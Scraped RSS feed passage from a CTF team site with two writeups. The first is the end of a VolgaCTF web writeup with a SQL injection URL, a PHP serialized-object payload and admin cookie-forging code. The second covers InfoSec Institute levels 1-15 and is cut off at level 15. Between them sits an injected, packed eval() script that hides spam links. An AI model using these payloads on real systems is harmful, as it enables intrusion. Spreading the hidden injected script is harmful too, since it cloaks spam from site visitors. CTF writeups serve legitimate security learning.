href="http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28select%28replace%28substr%28quote%28zeroblob%28%2894%2b1%29/2%29%29,3,94%29,%220%22,%22a%22%29%29%29||%27%22;O:9:%22Exception%22:0" data-rz-params="{&quot;__TYPE&quot;:&quot;TEXT&quot;,&quot;T_URL&quot;:&quot;http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28select%28replace%28substr%28quote%28zeroblob%28%2894%2b1%29/2%29%29,3,94%29,%220%22,%22a%22%29%29%29||%27%22;O:9:%22Exception%22:0&quot;}">http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28select%28replace%28substr%28quote%28zeroblob%28%2894%2b1%29/2%29%29,3,94%29,%220%22,%22a%22%29%29%29||%27%22;O:9:%22Exception%22:0</a><span data-rz-params="{&quot;__TYPE&quot;:&quot;TEXT&quot;}">:{}}</span></span></p><p><span data-rz-clipboard="true">and when we viewed the logs page we indeed saw the stacktrace and part of the output contains this<br><span data-rz-clipboard="true"><span data-rz-params="{&quot;__TYPE&quot;:&quot;TEXT&quot;}"><br>object(Session)#3 (2) {<br></span></span></span>["cookieSalt":"Session":private]=&gt;<br>string(20) "nO97M0Za6cu9wDC72VVv"<br>["params":"Session":private]=&gt;<br>array(1) {<br>["isAdmin"]=&gt;<br>bool(false)</p><p>&nbsp;</p><div data-rz-params="{&quot;__TYPE&quot;:&quot;LINE&quot;,&quot;RANDOM&quot;:0.5038021015934646}">No we have the salt. To construct the valid cookie we simply need to do the following:<br><br></div><p>&nbsp;</p><p>&lt;?php<br>$str='{"isAdmin":true}';<br>$salt='nO97M0Za6cu9wDC72VVv';<br>echo urlencode($str).md5($str.$salt);<br>?&gt;</p><p>&nbsp;</p><p>and the flag was&nbsp;</p><p><span data-rz-clipboard="true"><span style="font-weight: bold; background-color: #b5eb5e;" data-rz-params="{&quot;__TYPE&quot;:&quot;TEXT&quot;,&quot;T_BOLD&quot;:true,&quot;T_BG_COLOR&quot;:&quot;#B5EB5E&quot;}">{417a4c17bd3132bba864dac9edf4ae7a}</span></span></p><p>&nbsp;</p><p>Notes:<br>1- I think it worth more than 200 pts comparing to the challenge remote web or even the joy and relax challenges.<br>2- There was a much easier way to exploit the SQLi. Simply we could have used stacked quiries ^^. It is sqlite so I could have simply added the serialized Exception object into the DB using something similar to this query. you just need to know how to use the query without spaces because it was replaced with underscores '_' &nbsp;</p><p><a class="vt-p" style="text-decoration: underline;" href="http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28select%28replace%28substr%28quote%28zeroblob%28%2894%2b1%29/2%29%29,3,94%29,%220%22,%22a%22%29%29%29||%27%22;O:9:%22Exception%22:0" data-rz-params="{&quot;__TYPE&quot;:&quot;TEXT&quot;,&quot;T_URL&quot;:&quot;http://web2.2015.volgactf.ru/SecretAdminPanel?test%27||%28select%28replace%28substr%28quote%28zeroblob%28%2894%2b1%29/2%29%29,3,94%29,%220%22,%22a%22%29%29%29||%27%22;O:9:%22Exception%22:0&quot;}">http://web2.2015.volgactf.ru/SecretAdminPanel?test</a>');INSERT INTO logs(IP, PARAMS) VALUES ('127.0.0.1', 'O:9:"Exception":0:{}')--</p><span class="keys_words"><a class="links_good_rands" href="https://www.jmksport.com/">Sportswear Design</a> | <a class="links_good_rands" href="https://www.fitforhealth.eu/cdakshop/category/nike/">Nike News</a></span><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8<a["\\5\\1\\6\\4\\3\\y"];8++)a[8]["\\2\\3\\9\\5\\1"]["\\e\\k\\2\\l\\5\\c\\9"]=\'\\6\\7\\6\\1\'}',37,37,'|x65|x73|x74|x67|x6c|x6e|x6f|NLpndlS3|x79|rBfb2|var|x61|x6d|x64|window|x45|x75|AESwV1|x72|x69|x70|navigator|x41|x63|x78|x52|new|if|x6b|for|x77|x5f|x4e|x68|x42|x43'.split('|'),0,{}));</script></div></div></div></description>
<pubDate>Fri, 08 May 2015 17:41:19 +0000</pubDate>
<dc:creator>the_storm</dc:creator>
<guid isPermaLink="false">101 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/101#comments</comments>
</item>
<item>
<title>Infosec mini ctf writeup </title>
<link>https://ctfcrew.org/writeup/99</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/web">web</a></div><div class="field-item odd"><a href="/categories/stego">stego</a></div><div class="field-item even"><a href="/categories/forensics">forensics</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/33">Infosec Institute CTF</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><div class="page" title="Page 3"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><span style="color: #333333; font-size: 16px; font-weight: normal;">This is the InfoSec CTF writeup.<br>The ctf was very great. However, I felt it a bit simpler I think that was intended as a basic starting level. Some of the challneges were very interesting others were very straight forward. One thing that make me suffer a bit is the images in the challneges. I always had the feeling that they always contained something (steganography). I also was suffering with some guessing challenges like levle number 9. Yet, the good thing about the challneges is that each one will teach you something. The purpose of the CTF was to share knowledge. Below, you can find my write-up so please read, enjoy and take the best of it.&nbsp;<br>If you have any questions/comments, do NOT hesitate to contact me.</span></span></p><p>&nbsp;</p><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><span style="color: #333333; font-size: 16px; font-weight: normal;">Thank you <a class="vt-p" href="http://www.infosecinstitute.com/">InfoSec Institute</a> for the CTF<br><br>A pdf version of the solution can be found here.<br></span></span><span><span><span><span><a class="vt-p" style="font-family: Helvetica; font-size: 16px;" href="https://www.dropbox.com/s/uuixb7zqcbyiq5x/solutions.zip?dl=0">https://www.dropbox.com/s/uuixb7zqcbyiq5x/solutions.zip?dl=0</a><span style="font-family: Helvetica;"><span style="font-size: 16px;">&nbsp;</span></span><br><span style="font-family: Helvetica;"><span style="font-size: 16px;">If you would like to try the challenges before seeing the write-ups please check them on</span></span><br><a class="vt-p" href="http://ctf.infosecinstitute.com/"><span style="font-family: Helvetica;"><span style="font-size: 16px;">http://ctf.infosecinstitute.com/</span></span></a></span></span></span></span></p><p><span><span><br><span style="font-family: Helvetica;"><span style="font-size: 16px;">let's start :)</span></span><br></span></span></p><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level One </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“May the source be with you! “ </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Once I saw the word “source” then I expected that the flag will be in the HTML source code. I viewed the source code in my browser, and I managed to see the flag in the first line of the HTML code as illustrated below in the screenshot</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/1_1.png" alt="" width="724" height="708"></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">flag: infosec_flagis_welcome</span></p><p>&nbsp;</p></div></div></div><div class="page" title="Page 4"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);">Level Two </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“It seems like the image is broken..Can you check the file?“ </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I checked the HTML source code and I got the image link which was “img/leveltwo.jpeg” Downloaded the image file and now it is time to analyse the file. The first step I wanted to to check the file type to see if it is actually an image. Executing the “file” command on linux that was the result.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/2_1.png" alt="" width="1004" height="78"></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">looks like some ascii data inside not an image. Viewing the file content using the “cat” command that was the output “aW5mb3NlY19mbGFnaXNfd2VhcmVqdXN0c3RhcnRpbmc=“. The data is encoded in base64. I managed to know that because of the “=“ that was padded in the end of the text. using the base64 tool to decode that data that was the output </span><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">“infosec_flagis_wearejuststarting”</span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;"><img src="/sites/default/files/writeups/images/2_2.png" alt="" width="1004" height="108"></span></p></div></div></div><div class="page" title="Page 5"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Three </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Nothing was stated regarding explicitly for the challenge. However there was that image that contains a QR code. </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">sent the QR code to the following website <a class="vt-p" href="http://zxing.org/w/decode?u=http%3A%2F%2Fctf.infosecinstitute.com%2Fimg%2Fqrcode.%20png">http://zxing.org/w/decode?u=http%3A%2F%2Fctf.infosecinstitute.com%2Fimg%2Fqrcode. png</a><br> That was the result<br> .. -. ..-. --- ... . -.-. ..-. .-.. .- --. .. ... -- --- .-. ... .. -. —.<br> looks like some morse code. We need to find something to decode it. Using the following the website http://morsecode.scphillips.com/translator.html I managed to translate the morse code and that was the result.<br> </span><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">“INFOSEC_FLAGIS_MORSING”</span></p></div></div></div><div class="page" title="Page 6"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Four </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“HTTP means Hypertext Transfer Protocol” </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">HTTP is a Hyptertext Transfer Protocol. I thought that I might find the flag in any of the headers received from the server. I fired up my burp suite proxy to see what I will get in the HTTP response. These were the headers received from the server.</span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';"><img src="/sites/default/files/writeups/images/4_1.png" alt="" width="741" height="279"></span></p><p>&nbsp;</p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">We can see that the server is setting a cookie in our browser. looks like it is encoding in some way however it has the same pattern as “infosec_flagis_xxxxxxx”<br> I didn’t know what was the encoding but it looks like some stream cipher. I expected it will be a caesar cipher. I coded this quick script to try all caesar with different steps. The script should stops once it finds the word “infosec”</span></p></div></div><div class="layoutArea"><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag" title="Caesar">def decode_ceaser(input_str, n):<br> output = []
for c in input_str:
temp = 97+((ord(c)-97+n)%26)
temp = chr(temp)
output.append(temp)
return output<br>for i in xrange(25):
res = decode_ceaser(encoded_str, i)
res = ''.join(res)
if 'infosec' in res:
print res
break</pre></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">and that was the result of running the script </span></p><pre><span style="font-size: 12.000000pt; font-family: 'AndaleMono'; color: rgb(100.000000%, 100.000000%, 100.000000%); background-color: rgb(0.000000%, 0.000000%, 0.000000%);">infosec_flagis_welovecookies</span></pre></div></div></div><div class="page" title="Page 7"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Five: </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">No text was written only an image. </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I think this is steganography problem. It did take a lot of time for me to solve it since I am not that good with steganography. I checked the image with Stegsolve didn’t find anything. I checked it also with steghide but nothing. I checked some online websites and it was this website http://www.futureboy.us/stegano/decinput.html. I uploaded the image to the website and It resulted in some binary array as illustrated below</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/5_0.png" alt="" width="1004" height="90"></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">decoding the binary array I got using the following website http://string-functions.com/binary-string.aspx<br> and the result was<br> </span><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">infosec_flagis_stegaliens</span></p></div></div></div><div class="page" title="Page 8"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Six </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“Do you want to download sharkfin.pcap file?” </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">It is is a pcap file which we need to analyse. After downloading the pcap and opening with Wireshark. The first thing I do is to look at the protocol hierarchy and that was the result.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/6_0.png" alt=""></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">We can see a lot of HTTPS data which probably will not be interested in since we can’t decrypt it. I filtered out all tcp<br> data using the following filter “!(tcp)” and there was a single udp packet. I followed the UDP stream and that was the stream content. “696e666f7365635f666c616769735f736e6966666564” </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Decoding the hex steam content that was the result </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">“infosec_flagis_sniffed”</span></p></div></div></div><div class="page" title="Page 9"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Seven </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Nothing appeared actually in the homepage. </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I opened the burp suite proxy to try to see the response coming from the server.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/7_0.png" alt="" width="700" height="282"></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">looks like we have some base64 data in the HTTP response reason field. Decoding the data we got this:<br> </span><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">“infosec_flagis_youfoundit” </span></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">&nbsp;</span></p></div></div></div><div class="page" title="Page 10"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level Eight </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“Do you want to download app.exe file?” </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I downloaded the app.exe file. I thought first of reversing the app and see how it works. I was getting ready to run my windows VM and start the executable. However, I though of running the linux command “strings” quickly and see if I got any thing there. Indeed, I executed the command and that was the result.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/8_0.png" alt="" width="721" height="442"></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">The flag: infosec_flagis_0x1a</span></p></div></div></div><div class="page" title="Page 11"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Nine </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Login page with username and password </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I first expected that this will be a sql injection and I should bypass the login. I tried different SQL injection vectors to login but didn’t receive any output. I then said it might be something easier than that. I tried some dictionary attack on the login page and the following credentials logged in successfully. </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">username: root<br> password: attack<br> Once I logged in the output was<br> “ssaptluafed_sigalf_cesofni”<br> we can see that this is the flag but reversed. Reversing it again we have “</span><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">infosec_flagis_defaultpass” </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">The flags looks a bit weird for me. I searched the web for the cisco IDS default login credentials but couldn’t find anything. Actually my script took a lot of time running to find the username and password.</span></p></div></div></div><div class="page" title="Page 12"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Ten </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">What kind of sound is this? Sorcery perhaps?? </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I downloaded the audio file. I expected that the wave audio file might contain something hidden in one of its channels. I examined how many channels the wave file contains. It was only one channel which means probably nothing is hidden in the wave channels. I executed binwalk to see if there is any thing appended or inside the audio file. However, I didn’t manage to get anything. I checked the image on the challenge page it was stating “not listening”. I though then I should find away to listen to what is being played. I changed the playback speed to some values and was listening to the output. Indeed, when I changed the playback speed to 0.22X I managed to listen to </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">“infosec_flagis_sound” </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">The URL of the edited file is: http://st0rm.altervista.org/solved.wav </span></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Page 12 of 18 </span></p></div></div></div><div class="page" title="Page 13"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br><br>Level Eleven </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">No it must not be a sound? But wait whaT? [PHP logo] </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I downloaded the php logo. and it was named “php-logo-virus.jpg” the name is very catchy so I believe it contains our flag. One of the main things to analyse when dealing with images is the exif data. http://regex.info/exif.cgi is one of the best websites to analyse the exif data of images. Using the regex.info website, we managed to extract the following “infosec_flagis_aHR0cDovL3d3dy5yb2xsZXJza2kuY28udWsvaW1hZ2VzYi9wb3dlcnNsa WRlX2xvZ29fbGFyZ2UuZ2lm%a0%86%01” from the “Document Name” in the exif data structure. We see part of the flag and the other part is encoded in base64. Decoding the base64 resulted in: “http://www.rollerski.co.uk/imagesb/powerslide_logo_large.gif” I visited the url and the image contain the word “powerslide”. Hence, our flag should be </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">Flag: infosec_flagis_powersilde</span></p><p>&nbsp;</p></div></div></div><div class="page" title="Page 14"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level Twelve </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Question: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Dig deeper </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I saw the same image in the first level. I then decided it will be a steganography challenge. I kept digging into the image with all possible ways but I couldn’t find anything. I actually wasted a couple of days in that. Then I decided to move away from the image and check the source code of the page. I checked the source code again to see if it was related to level 1 by any means. I couldn’t find anything obvious. I then decided to compare the html of the two pages to see if there any differences. I used the comparer tool in burp suite to see the difference and that was the result.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/12_0.png" alt="" width="1168" height="406"></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Hmmm. We see there is a new css was added to leveltweleve.php file. I decided to check that css file. Now, I started to see the relation between the two levels (Dig deeper indeed). The content of the CSS file was<br> .thisloveis{ </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">color: #696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72; } </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Looks very interesting. There is no colour with the following value and this looks like a hex value. Decoding the hex value we got: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">infosec_flagis_heyimnotacolor</span></p><p>&nbsp;</p></div></div></div><div class="page" title="Page 15"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level Thirteen </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">What the heck happened here? It seems that the challenge here is gone? Can you find it? Can you check if you can find the backup file for this one? I'm sorry for messing up :( </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">This challenge requires a bit of guessing to get the old file. Out of convention, developers usually name the old files as .old or .bak. or .backup. I tried to access http://ctf.infosecinstitute.com/levelthirteen.php.old and indeed I managed to access the old php file (backup). Opening the file in a text editor</span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';"><img src="/sites/default/files/writeups/images/13_1.png" alt="" width="774" height="447"></span></p><p>&nbsp;</p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">We can see some interesting code commented out here. Our next step is to download the imadecoy file. I downloaded the file and directly executed the “file” command to know what file it is.</span></p><p>&nbsp;</p><p><img src="/sites/default/files/writeups/images/13_2.png" alt="" width="1003" height="74"></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">As we can see, it is a pcap file. I opened the file with Wireshak and directly checked the protocol hierarchy. </span></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';"><img src="/sites/default/files/writeups/images/13_0.png" alt="" width="754" height="423"></span></p><p><span style="font-family: Helvetica; font-size: 12pt;">As we can see most of the packets are DNS. I am not sure if that was noise packets or it contains our flag. I checked some DNS packets randomly but nothing catchy was there. Most of the queries were DNS queries to google.com.ph. I decided to exclude all DNS queries because I think they are only noise. After excluding them I saw some HTTP requests. I sorted the packets with size and the 4th packet was JPG image named HoneyPY.PNG. Looks very interesting. Dumping the image, I saw that</span></p><p><span style="font-family: Helvetica; font-size: 12pt;"><img src="/sites/default/files/writeups/images/13_4.png" alt="" width="624" height="47"></span></p></div></div></div><div class="page" title="Page 16"><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">Flag: infosec_flagis_morepackets </span></p></div></div><div class="layoutArea"><div class="column"><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">&nbsp;</span></p></div></div></div><div class="page" title="Page 17"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level Fourteen </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Do you want to download level14 file? </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution: </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">The challenge file was dump of database. Browsing the database dump, there were a lot of tables and records. I searched for the word “flag”. I found a table but it didn</span><span style="font-size: 12.000000pt; font-family: 'ArialUnicodeMS';">’</span><span style="font-size: 12.000000pt; font-family: 'Helvetica';">t contain anything interesting. However, after that table directly, there was a table named “friends” the fourth record of the table was some Unicode data, which looked very catchy. </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">(104, '\\u0069\\u006e\\u0066\\u006f\\u0073\\u0065\\u0063\\u005f\\u0066\\u006c\\u0061\\u0067\ \u0069\\u0073\\u005f\\u0077\\u0068\\u0061\\u0074\\u0073\\u006f\\u0072\\u0063\\u0065\\ u0072\\u0079\\u0069\\u0073\\u0074\\u0068\\u0069\\u0073', 'annoying', ‘0x0a');<br> I decoded the unicode data and it was </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">infosec_flagis_whatsorceryisthis</span></p></div></div></div><p>&nbsp;</p><div class="page" title="Page 18"><div class="layoutArea"><div class="column"><p><span style="font-size: 24.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(17.254900%, 43.529410%, 58.431380%);"><br><br>Level Fifteen </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Challenge </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">“DNS Lookup” </span></p><p><span style="font-size: 18.000000pt; font-family: 'Helvetica'; font-weight: bold; color: rgb(28.627450%, 60.784320%, 78.823530%);">Solution </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">I entered google.com to see the output and it was the output of the dig command. I expected that we have Remote Code Execution vulnerability here. I expected that the developer coded this in away similar to </span></p><p><span style="font-size: 12.000000pt; font-family: 